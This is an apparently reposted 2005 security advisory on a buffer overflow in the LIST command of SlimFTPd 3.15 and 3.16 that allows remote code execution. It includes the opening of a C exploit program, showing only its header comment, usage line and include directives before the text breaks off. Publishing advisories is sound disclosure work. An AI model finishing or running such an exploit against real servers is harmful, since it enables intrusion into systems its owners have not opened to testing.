Wednesday, July 27, 2005

[EXPL] SlimFTPd Buffer Overflow (LIST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

SlimFTPd Buffer Overflow (LIST)
------------------------------------------------------------------------

SUMMARY

<http://www.whitsoftdev.com/slimftpd/> SlimFTPd is a fully
standards-compliant FTP server implementation with an advanced virtual
file system.

Due to lack of proper length checking routines in SlimFTPd, attackers are
able to to execute arbitrary code by overflowing a buffer the program
uses. The following exploit code can be used to test your system for the
mentioned vulnerabilities.

DETAILS

Vulnerable Systems:
* SlimFtpd 3.15
* SlimFtpd 3.16

Exploit:
/*
*
* Written by redsand
* <redsand@redsand.net>
*
* Jul 22, 2005
* Vulnerable: SlimFtpd v3.15 and v3.16
* original vuln found by: Raphael Rigo
*
* Usage: ./redslim 127.0.0.1 [# OS RET ]
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN
#include <winsock2.h>
#include <windows.h>
// #pragma lib <ws2_32.lib> // win32-lcc specific
#pragma comment(lib, "ws2_32.lib") // ms vc++
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>

No comments:

Post a Comment